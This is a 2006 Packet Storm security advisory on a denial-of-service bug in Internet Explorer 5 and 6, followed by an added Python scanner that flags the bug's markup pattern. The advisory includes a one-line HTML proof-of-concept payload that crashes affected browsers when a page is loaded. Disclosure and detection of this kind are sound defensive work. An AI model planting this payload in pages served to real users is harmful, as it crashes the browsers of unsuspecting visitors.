MSIEDoS.txt

21 Jan 2006 | Reported by Inge Henriksen | Type: packetstorm | Source: packetstormsecurity.com

Microsoft Internet Explorer Remote DoS using IMG & XML elements vulnerability

Code
`Advisory Name  
Microsoft(R) Internet Explorer 5 & 6 Remote Denial of Service (DoS) using IMG & XML elements  
  
Release Date  
14. January 2006  
  
Vulnerable Product  
Microsoft(R) Internet Explorer 5  
Microsoft(R) Internet Explorer 6  
  
Tested and Confirmed Vulnerable  
Microsoft® Windows® XP Professional with Service Pack 2 and IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
Microsoft® Windows® Server 2003 with IE 6.0.2790.0  
Microsoft® Windows® 2000 Advanced Server 5.00.2195 with Service Pack 4 and IE 5.00.3700.1000  
Other combinations are likely to be vulnerable, so far all systems that I have tested had the bug.  
  
Severity  
Medium  
  
Discovered by  
Inge Henriksen ([email protected]) http://ingehenriksen.blogspot.com/  
  
Vendor Status  
Notified 30. December 2005, no fix at present.  
  
Arbitrary Code Injection  
This is a null pointer dereference, thanks to H D Moore from Metasploit for help on this issue.  
  
Overview  
I have found that Microsoft(R) Internet Explorer 5 and Microsoft(R) Internet Explorer 6 are vulnerable to a Denial of Service. So far all combinations of OS's and IE versions I have tested are vulnerable. The exploit is triggered by bad HTML data combined with a bad XML block; this HTML code can be hidden inside a webpage etc.  
  
Proof of Concept  
Any HTML page that contains the following HTML code will cause the DoS:  
  
<table><tr><td><IMG align=left>X X X<?xml:namespace prefix=v ><v:X style="HEIGHT:1"></td></tr></table>  
`
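
A defensive check for the markup pattern in the proof of concept, as an added example that is not part of the original advisory: a Python `html.parser` heuristic that a content filter or crawler could run over pages. The class and function names are hypothetical, and the rule (a namespace-prefixed element with a `style` attribute in the same table cell as an aligned `IMG`) is an assumption drawn from the PoC's structure, since the advisory does not say which parts are required for the crash.

```python
import re
from html.parser import HTMLParser

# Markup quoted from the advisory's proof of concept (used only as scanner input).
POC_FROM_PAGE = ('<table><tr><td><IMG align=left>X X X<?xml:namespace prefix=v >'
                 '<v:X style="HEIGHT:1"></td></tr></table>')
# Constructed benign sample: aligned image in a cell, no namespaced element.
BENIGN_CONSTRUCTED = '<table><tr><td><img align=left src="a.png">text</td></tr></table>'

class ImgXmlNamespaceScanner(HTMLParser):
    """Heuristic (assumed rule): flags the element combination seen in the PoC."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.cells = []        # one dict per currently open <td>/<th>
        self.prefixes = set()  # prefixes declared via <?xml:namespace prefix=...>
        self.findings = []     # (line, column, description)

    def handle_pi(self, data):
        # html.parser passes the text between "<?" and the next ">"
        m = re.match(r"xml:namespace\b.*?\bprefix\s*=\s*[\"']?([\w-]+)",
                     data, re.I | re.S)
        if m:
            self.prefixes.add(m.group(1).lower())

    def handle_starttag(self, tag, attrs):
        names = {k for k, _ in attrs}
        if tag in ("td", "th"):
            self.cells.append({"aligned_img": False})
        elif tag == "img" and "align" in names and self.cells:
            self.cells[-1]["aligned_img"] = True
        elif ":" in tag and self.cells:
            prefix = tag.split(":", 1)[0]
            if (prefix in self.prefixes and "style" in names
                    and self.cells[-1]["aligned_img"]):
                line, col = self.getpos()
                self.findings.append(
                    (line, col, f"<{tag}> with style after aligned <img> in same cell"))

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self.cells:
            self.cells.pop()

def scan_html(text):
    """Return a list of (line, column, description) findings for one document."""
    scanner = ImgXmlNamespaceScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings
```

A hit is a reason to inspect or strip the page before it reaches an affected browser; it does not prove the page triggers the crash.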
